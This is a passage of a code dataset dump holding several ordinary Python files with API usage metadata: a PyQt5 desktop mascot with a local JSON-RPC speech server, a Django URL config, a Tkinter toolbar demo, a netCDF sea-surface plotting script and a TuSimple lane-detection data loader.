"django.forms.CharField", "line_number": 25, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 25, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 26, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 27, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 27, "usage_type": "name"}, {"api_name": "django.forms.Textarea", "line_number": 27, "usage_type": "call"}, {"api_name": "django.forms.ChoiceField", "line_number": 28, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 28, "usage_type": "name"}, {"api_name": "django.forms.ChoiceField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 29, "usage_type": "name"}, {"api_name": "django.forms.ChoiceField", "line_number": 30, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 30, "usage_type": "name"}, {"api_name": "django.forms.DecimalField", "line_number": 31, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 31, "usage_type": "name"}, {"api_name": "django.forms.IntegerField", "line_number": 32, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 32, "usage_type": "name"}]} +{"seq_id": "561989715", "text": "#!/usr/bin/env python3\n\nfrom PyQt5.QtCore import QDir, Qt, QEvent, QRect, QPoint, QTimer\nfrom PyQt5.QtGui import QImage, QPainter, QPalette, QPixmap, QColor, QScreen, \\\n QWindow, QRegion, QIcon, QVector2D\nfrom PyQt5.QtWidgets import QAction, QApplication, QFileDialog, QLabel, \\\n QMainWindow, QMenu, QMessageBox, QScrollArea, QSizePolicy, QDialog\nimport pyuv\nimport pyuv.error\nimport json\nimport jsonrpc\nimport sys\nimport math\nimport random\nimport inspect\nimport functools\n\nclass Ghost(QMainWindow):\n def __init__(self, use_title_bar=False, always_on_top=False, name=sys.argv[0], opacity=None):\n super().__init__()\n self.use_title_bar = use_title_bar\n self.always_on_top = always_on_top\n\n if self.use_title_bar:\n self.setAttribute(Qt.WA_NoSystemBackground)\n self.setAttribute(Qt.WA_TranslucentBackground)\n else:\n self.setWindowFlags(self.windowFlags() | Qt.FramelessWindowHint)\n\n if self.always_on_top:\n self.setWindowFlags(self.windowFlags() | Qt.WindowStaysOnTopHint)\n\n self.name = name\n self.setWindowTitle(self.name)\n self.balloons = []\n\n self.imageLabel = QLabel()\n # self.imageLabel.setAttribute(Qt.WA_MouseNoMask)\n self.setCentralWidget(self.imageLabel)\n\n if opacity is not None:\n self.setWindowOpacity(opacity)\n\n self.createActions()\n self.createMenus()\n\n def loadImage(self, fileName):\n image = QImage(fileName)\n assert not image.isNull()\n\n pixmap = QPixmap.fromImage(image)\n mask = pixmap.createMaskFromColor(QColor(image.pixel(0,0)), Qt.MaskInColor)\n if self.use_title_bar:\n pixmap.setMask(mask)\n self.imageLabel.setMask(mask)\n else:\n self.setMask(mask)\n\n self.imageLabel.setPixmap(pixmap)\n self.imageLabel.adjustSize()\n self.setFixedSize(image.size())\n\n self.landOnScreen()\n\n def landOnScreen(self):\n screen = QApplication.screens()[0].size()\n self.move(self.x(), screen.height() - self.height()\n + self.y() - self.geometry().y())\n\n def speak(self, text):\n balloon = Balloon(text, point=self.newBalloonPoint(), parent=self)\n def closure(ev):\n try:\n self.balloons.remove(balloon)\n except ValueError:\n pass\n balloon.destroyed.connect(closure)\n self.balloons.append(balloon)\n balloon.show()\n # before show(), the size() have not calculated yet\n pos = balloon.pos() - QPoint(balloon.width()/2, balloon.height()/2)\n if pos.x() < 0: pos.setX(0)\n if pos.y() < 0: pos.setY(0)\n screen = QApplication.screens()[0].size() - balloon.size()\n if screen.width() < pos.x(): pos.setX(screen.width())\n if screen.height() < pos.y(): pos.setY(screen.height())\n balloon.move(pos)\n\n def newBalloonPoint(self):\n screen = QApplication.screens()[0].size()\n headradius = min(self.width(), self.height()) / 2\n pos = self.pos() + QPoint(headradius, headradius)\n tocenter = QVector2D(screen.width()/2-pos.x(), screen.height()/2-pos.y())\n radorig = math.atan2(tocenter.y(), tocenter.x())\n raddiff = random.gauss(0, 0.5**2)*math.pi\n radius = headradius * random.uniform(1.6,2.2)\n diff = QPoint(radius*math.cos(radorig+raddiff), radius*math.sin(radorig+raddiff))\n return pos + diff\n\n def moveByName(self, name):\n dic = {\n 'left': 0,\n 'right': QApplication.screens()[0].size().width(),\n 'center': QApplication.screens()[0].size().width()/2-self.width()/2,\n }\n self.move(dic[name], self.y())\n\n def closeEvent(self, ev):\n for balloon in self.balloons:\n balloon.close()\n\n def dropEvent(self, ev):\n self.landOnScreen()\n\n def mousePressEvent(self, ev):\n super().mousePressEvent(ev)\n self.dragAnchor = ev.pos()\n\n def mouseMoveEvent(self, ev):\n super().mouseMoveEvent(ev)\n if hasattr(self, 'dragAnchor'):\n self.move(ev.globalPos() - self.dragAnchor)\n\n def mouseReleaseEvent(self, ev):\n super().mouseReleaseEvent(ev)\n if hasattr(self, 'dragAnchor'):\n del self.dragAnchor\n self.landOnScreen()\n\n def mouseDoubleClickEvent(self, ev):\n super().mouseDoubleClickEvent(ev)\n self.close()\n\n def about(self):\n QMessageBox.about(self, \"About This\", \"

hello world

\")\n\n def createActions(self):\n self.exitAct = QAction(\"E&xit\", self, triggered=self.close)\n\n self.aboutAct = QAction(\"&About\", self, triggered=self.about)\n self.aboutQtAct = QAction(\"About &Qt\", self,\n triggered=QApplication.instance().aboutQt)\n\n def createMenus(self):\n self.fileMenu = QMenu(\"&File\", self)\n self.fileMenu.addAction(self.exitAct)\n\n self.viewMenu = QMenu(\"&View\", self)\n\n self.helpMenu = QMenu(\"&Help\", self)\n self.helpMenu.addAction(self.aboutAct)\n self.helpMenu.addAction(self.aboutQtAct)\n\n self.menuBar().addMenu(self.fileMenu)\n self.menuBar().addMenu(self.viewMenu)\n self.menuBar().addMenu(self.helpMenu)\n\n\nclass Balloon(QMainWindow):\n def __init__(self, text, point=None, parent=None):\n super().__init__()\n\n self.setWindowOpacity(0.9)\n self.setWindowFlags(self.windowFlags() | Qt.FramelessWindowHint)\n self.setWindowFlags(self.windowFlags() | Qt.WindowStaysOnTopHint)\n\n self.label = QLabel(text)\n self.setCentralWidget(self.label)\n\n if parent is not None:\n pass\n if point is not None:\n self.move(point)\n\n def mouseReleaseEvent(self, ev):\n super().mouseReleaseEvent(ev)\n self.close()\n\nclass RpcServer(object):\n def __init__(self, host, port, dispatcher=None):\n if dispatcher is None:\n dispatcher = jsonrpc.Dispatcher()\n self.dispatcher = dispatcher\n self.clients = []\n self.loop = pyuv.Loop.default_loop()\n self.server = pyuv.TCP(self.loop)\n self.server.bind((host, port))\n self.server.listen(self.forward_jsonrpc)\n self.jsonrpc = jsonrpc.JSONRPCResponseManager()\n\n self.dispatcher['register_listen'] = self.register_listen\n self.dispatcher['listen'] = self.listen\n self.listeners = []\n\n def register_listen(self, tcp_handler):\n self.listeners.append(tcp_handler)\n\n def listen(self, message):\n req = json.dumps({\n 'jsonrpc': 2.0,\n 'method': 'listen',\n 'params': [message],\n })\n for x in list(self.listeners):\n try:\n x.write(req.encode() + b'\\n')\n except pyuv.error.HandleError:\n self.listeners.remove(x)\n\n def forward_jsonrpc(self, server, error):\n client = pyuv.TCP(server.loop)\n server.accept(client)\n self.clients.append(client)\n client.start_read(self.talk_jsonrpc)\n\n def talk_jsonrpc(self, client, data, error):\n if data is None:\n client.close()\n self.clients.remove(client)\n return\n if not hasattr(client, 'dispatcher'):\n client.dispatcher = jsonrpc.Dispatcher()\n for key,elem in self.dispatcher.method_map.items():\n sig = inspect.signature(elem)\n try:\n sig.bind_partial(tcp_handler=client)\n except TypeError:\n pass\n else:\n elem = functools.partial(elem, tcp_handler=client)\n client.dispatcher[key] = elem\n response = self.jsonrpc.handle(data.decode(), client.dispatcher)\n if response is not None: # == notification (no id)\n client.write(response.json.encode().rstrip() + b'\\n')\n\n\nif __name__ == '__main__':\n import argparse\n import traceback\n parser = argparse.ArgumentParser()\n parser.add_argument('file')\n parser.add_argument('--name', default=sys.argv[0])\n parser.add_argument('--left', const='left', action='store_const', dest='position')\n parser.add_argument('--right', const='right', action='store_const', dest='position')\n parser.add_argument('--center', const='center', action='store_const', dest='position')\n parser.add_argument('--auto', const=None, action='store_const', dest='position')\n parser.add_argument('--opacity', type=float)\n parser.add_argument('--title-bar', action='store_true')\n parser.add_argument('--always-on-top', action='store_true', default=True)\n parser.add_argument('--host', default='127.0.0.1')\n parser.add_argument('--port', default=9802, type=int, help='default: 9802')\n args, unknown_args = parser.parse_known_args()\n\n app = QApplication(unknown_args)\n\n # The default sys.excepthook blocks things. But I want to use ^C instead of kill(1).\n def excepthook(type, value, tb):\n traceback.print_exception(type, value, tb)\n app.exit(1)\n sys.excepthook = excepthook\n\n ghost = Ghost(\n use_title_bar=args.title_bar,\n always_on_top=args.always_on_top,\n name=args.name,\n opacity=args.opacity)\n ghost.loadImage(args.file)\n if args.position is not None:\n ghost.moveByName(args.position)\n\n server = RpcServer(args.host, args.port)\n server.dispatcher['speak'] = ghost.speak\n\n timer = QTimer();\n timer.timeout.connect(lambda: server.loop.run(pyuv.UV_RUN_NOWAIT))\n timer.start(100)\n\n ghost.show()\n sys.exit(app.exec())\n", "sub_path": "interface.py", "file_name": "interface.py", "file_ext": "py", "file_size_in_byte": 9674, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 18, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 19, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt.WA_NoSystemBackground", "line_number": 25, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 25, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.WA_TranslucentBackground", "line_number": 26, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 26, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.FramelessWindowHint", "line_number": 28, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 28, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.WindowStaysOnTopHint", "line_number": 31, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 31, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 37, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QImage", "line_number": 48, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QPixmap.fromImage", "line_number": 51, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 51, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QColor", "line_number": 52, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.MaskInColor", "line_number": 52, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 52, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication.screens", "line_number": 66, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 66, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QPoint", "line_number": 81, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication.screens", "line_number": 84, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 84, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication.screens", "line_number": 90, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 90, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QPoint", "line_number": 92, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QVector2D", "line_number": 93, "usage_type": "call"}, {"api_name": "math.atan2", "line_number": 94, "usage_type": "call"}, {"api_name": "random.gauss", "line_number": 95, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 95, "usage_type": "attribute"}, {"api_name": "random.uniform", "line_number": 96, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QPoint", "line_number": 97, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 97, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 97, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication.screens", "line_number": 103, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 103, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication.screens", "line_number": 104, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 104, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.about", "line_number": 135, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 135, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QAction", "line_number": 138, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QAction", "line_number": 140, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QAction", "line_number": 141, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication.instance", "line_number": 142, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 142, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMenu", "line_number": 145, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMenu", "line_number": 148, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMenu", "line_number": 150, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 159, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.FramelessWindowHint", "line_number": 164, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 164, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.WindowStaysOnTopHint", "line_number": 165, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 165, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 167, "usage_type": "call"}, {"api_name": "jsonrpc.Dispatcher", "line_number": 182, "usage_type": "call"}, {"api_name": "pyuv.Loop.default_loop", "line_number": 185, "usage_type": "call"}, {"api_name": "pyuv.Loop", "line_number": 185, "usage_type": "attribute"}, {"api_name": "pyuv.TCP", "line_number": 186, "usage_type": "call"}, {"api_name": "jsonrpc.JSONRPCResponseManager", "line_number": 189, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 199, "usage_type": "call"}, {"api_name": "pyuv.error", "line_number": 207, "usage_type": "attribute"}, {"api_name": "pyuv.TCP", "line_number": 211, "usage_type": "call"}, {"api_name": "jsonrpc.Dispatcher", "line_number": 222, "usage_type": "call"}, {"api_name": "inspect.signature", "line_number": 224, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 230, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 240, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 242, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 254, "usage_type": "call"}, {"api_name": "traceback.print_exception", "line_number": 258, "usage_type": "call"}, {"api_name": "sys.excepthook", "line_number": 260, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 274, "usage_type": "call"}, {"api_name": "pyuv.UV_RUN_NOWAIT", "line_number": 275, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 279, "usage_type": "call"}]} +{"seq_id": "377845228", "text": "from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^fill/$', views.fill, name='fill'),\n url(r'^clear/$', views.clear, name='clear'),\n url(r'^country/(?P[\\w-]+)/$', views.country, name='country'),\n url(r'^city/(?P[\\w-]+)/$', views.city, name='city'),\n url(r'^airport/(?P[\\w-]+)/$', views.airport, name='airport'),\n]\n", "sub_path": "catalog/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 439, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "193694498", "text": "from tkinter import *\nfrom PIL import Image,ImageTk\n\nclass TkInterEx:\n\n @staticmethod\n def quit_app(event=None):\n root.quit()\n\n def on_fav_food_select(self,event=None):\n lb_widget = event.widget\n index = int(lb_widget.curselection()[0])\n lb_value = lb_widget.get(index)\n\n self.fav_food_label['text']=\"I'll get you \"+lb_value\n\n\n\n def __init__(self,root):\n root.title(\"Toolbar Example\")\n\n\n menubar = Menu(root)\n\n file_menu = Menu(root,tearoff=0)\n\n file_menu.add_command(label=\"open\")\n file_menu.add_command(label=\"save\")\n file_menu.add_command(label=\"quit\",command=self.quit_app)\n\n menubar.add_cascade(label=\"file\",menu=file_menu)\n\n # toolbar\n toolbar = Frame(root,bd=1,relief=RAISED)\n\n open_img = Image.open('open.png')\n save_img = Image.open('save.png')\n exit_img = Image.open('exit.png')\n\n open_icon = ImageTk.PhotoImage(open_img)\n save_icon = ImageTk.PhotoImage(save_img)\n exit_icon = ImageTk.PhotoImage(exit_img)\n\n open_button = Button(toolbar,image=open_icon)\n save_button = Button(toolbar,image=save_icon)\n exit_button = Button(toolbar,image=exit_icon,command=self.quit_app)\n\n open_button.image = open_icon\n save_button.image = save_icon\n exit_button.image = exit_icon\n\n open_button.pack(side=LEFT,padx=2,pady=2)\n save_button.pack(side=LEFT,padx=2,pady=2)\n exit_button.pack(side=LEFT,padx=2,pady=2)\n\n toolbar.pack(side=TOP,fill=X)\n root.config(menu=menubar)\n\n \n\nroot = Tk()\nroot.geometry('600x550')\napp = TkInterEx(root)\nroot.mainloop()\n", "sub_path": "toolbar.py", "file_name": "toolbar.py", "file_ext": "py", "file_size_in_byte": 1678, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "PIL.Image.open", "line_number": 36, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 36, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 37, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 37, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 38, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 38, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 40, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 40, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 41, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 41, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 42, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 42, "usage_type": "name"}]} +{"seq_id": "97709515", "text": "from netCDF4 import Dataset\nimport numpy as np\n#import pandas as pd\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport os\n\n\n\n# in batch mode, without display\n#matplotlib.use('Agg') \n\nfile = 'netcdf/OS_PIRATA-FR29_TSG.nc'\nncpath = '.'\npath = 'plots'\n\nncfile = os.path.join(ncpath, file)\nnc = Dataset(ncfile, mode='r')\n\nSSPS = nc.variables['SSPS']\nSSTP = nc.variables['SSTP']\nTIME = nc.variables['TIME']\nLATITUDE = nc.variables['LATITUDE']\nLONGITUDE = nc.variables['LONGITUDE']\nCM = nc.cycle_mesure\n\n# move subplot outside loop prevent: RuntimeWarning: More than 20 figures have been opened.\n\nfig, ax = plt.subplots(2, 1, figsize=(6, 12))\nfig.subplots_adjust(left=0.125, bottom=0.1, right=0.9, top=0.9, wspace=0.3, hspace=0.3)\n\nim1 = ax[0].scatter(LONGITUDE[:], LATITUDE[:], c=SSPS[:], s=30, cmap='jet', vmin=32, vmax=37)\nfig.colorbar(im1, ax=ax[0], orientation='vertical')\nax[0].set(xlabel='{} '.format(LONGITUDE.standard_name), ylabel='{} '.format(LATITUDE.standard_name),\n title='{} - {}'.format(CM, SSPS.long_name))\nax[0].grid()\n\nim2 = ax[1].scatter(LONGITUDE[:], LATITUDE[:], c=SSTP[:], s=30, cmap='jet', vmin=21, vmax=32)\nfig.colorbar(im2, ax=ax[1], orientation='vertical')\nax[1].set(xlabel='{} '.format(LONGITUDE.standard_name), ylabel='{} '.format(LATITUDE.standard_name),\n title='{} - {}'.format(CM, SSPS.long_name))\nax[1].grid()\n\nfigname = '{}_TSG_COLCOR_SCATTER.png'.format(CM)\ndest = os.path.join(path, figname)\nfig.savefig(dest)\nprint('Printing: ', dest)\n\nplt.show()\nplt.cla()\n\n#im1 = cs[0, 0].contourf(lon,lat,result1, np.linspace(20,30,21), extend='both', cmap=cm.jet)\n#cs[0, 0].set_title('VOTEMPER OBS Saison ' + list1[x],fontsize=10)\n#fig.colorbar(im1, ax=cs[0, 0], orientation='horizontal')\n\n######################################df = pd.DataFrame(np.transpose([LONGITUDE[:], LATITUDE[:], SSPS[:]]), columns=['LONGITUDE', 'LATITUDE', 'SSPS']) #, columns=['Longitudes','Latitudes']\n######################################ax = df.plot.scatter(x='LONGITUDE', y='LATITUDE', c='SSPS', colormap='viridis')\n######################################ax.set_ylim(bottom=-12,top=19)\n######################################ax.set_xlim(left=-30, right=15)\n######################################print(df)\n\n#A = np.array((LONGITUDE, LATITUDE, SSTP), dtype=float)\n#print(SSPS[36])\n#print(A)\n#plt.plot(LATITUDE,LONGITUDE,A)\n", "sub_path": "stage/plot_scatter_tsg.py", "file_name": "plot_scatter_tsg.py", "file_ext": "py", "file_size_in_byte": 2341, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "netCDF4.Dataset", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.show", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cla", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}]} +{"seq_id": "10385535", "text": "from torch.utils.data import Dataset, DataLoader\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport warnings\nimport os,json\nimport numpy as np\nimport cv2\nfrom scipy.ndimage.morphology import grey_dilation\nfrom scipy.interpolate import CubicSpline\n#from utils.util import *\nfrom skimage import filters\n\nwarnings.filterwarnings(\"ignore\")\n\nclass TUSimple(Dataset):\n def __init__(self, path):\n self.path = path\n self.LINE_SIZE = 30\n sub = [i for i in os.listdir(self.path) if i!=\".DS_Store\"]\n labels = [self.path + \"/\" + i for i in sub if i[-4:]==\"json\"]\n images_root_path = self.path + \"/clips\"\n images = list()\n self.labels = dict()\n images_folders = [self.path+\"/clips/\"+i for i in os.listdir(images_root_path) if i!=\".DS_Store\"]\n for imgs_folder in images_folders:\n for i in os.listdir(imgs_folder):\n if(\"DS\" in i):\n continue\n\n tmp_path = imgs_folder + \"/\" +i\n lst_of_imgs = [imgs_folder + \"/\" + i+\"/\"+j for j in os.listdir(tmp_path) if j==\"20.jpg\"]\n images += lst_of_imgs\n\n self.images = images\n for label_path in labels:\n with open(label_path,\"r\") as f:\n for i in f.readlines():\n todict = json.loads(i[:-1])\n label_img_name = todict['raw_file']\n self.labels[label_img_name] = todict\n\n def __len__(self):\n return len(self.images)\n\n def __getitem__(self, idx):\n image_path = self.images[idx]\n key_ind = image_path.split(\"/\").index(\"clips\")\n key_path = os.path.join( *image_path.split(\"/\")[key_ind:])\n abs_path = self.path +\"/\"+os.path.join( *image_path.split(\"/\")[key_ind:])\n\n label = self.labels[key_path]\n lanes_w = np.array(label['lanes'])\n lanes_h = np.array(label['h_samples'])\n lane_cnt = lanes_w.shape[0]\n\n image = plt.imread(image_path) #(720, 1280, 3)\n image=np.pad(image, ((8,8), (0,0), (0, 0)), 'constant')\n image = cv2.resize(image, dsize=(640,368), interpolation=cv2.INTER_AREA)\n hmap = np.zeros(image.shape[:2])\n\n lane_pair = list()\n point = 0\n for i in range(lane_cnt):\n mask = (lanes_w[i,:] * lanes_h) > 0\n xs = (lanes_w[i,:][mask]-8) /1280. * 640.\n ys = lanes_h[mask] /728. * 368.\n ys = np.clip(ys, 0, 639)\n for j in range(xs.shape[0]):\n try:\n hmap[int(ys[j]), int(xs[j])] = 1\n except:\n print(ys)\n print(xs)\n if(j0, 1, 0)\n instance = hmap\n\n show = False\n if show:\n plt.subplot(4,1,1)\n plt.imshow(image)\n plt.subplot(4,1,2)\n plt.imshow(image)\n plt.imshow(hmap, alpha=0.5)\n plt.subplot(4,1,3)\n plt.imshow(instance)\n plt.subplot(4,1,4)\n plt.imshow(binary)\n plt.show()\n\n return image, binary, instance\n\nif __name__==\"__main__\":\n import random\n random.seed(a=None)\n dataset = TUSimple(\"/home/yo0n/바탕화면/TUsimple\")\n o = dataset[random.randint(0,len(dataset)-1)]\n print(o[0].shape, o[1].shape, o[2].shape) # (368, 640) (368, 640)\n\n lanes = int(o[2].max())\n plt.subplot(lanes+2,1,1)\n plt.imshow(o[0])\n plt.subplot(lanes+2,1,2)\n plt.imshow(o[2])\n for i in range(lanes):\n plt.subplot(lanes+2,1,i+3)\n plt.imshow(o[2]==(i+1))\n plt.show()\n", "sub_path": "dataloader.py", "file_name": "dataloader.py", "file_ext": "py", "file_size_in_byte": 3859, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "warnings.filterwarnings", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.utils.data.Dataset", "line_number": 15, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 19, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 24, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 26, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 31, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imread", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "numpy.pad", "line_number": 57, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 58, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 67, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "random.seed", "line_number": 99, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": 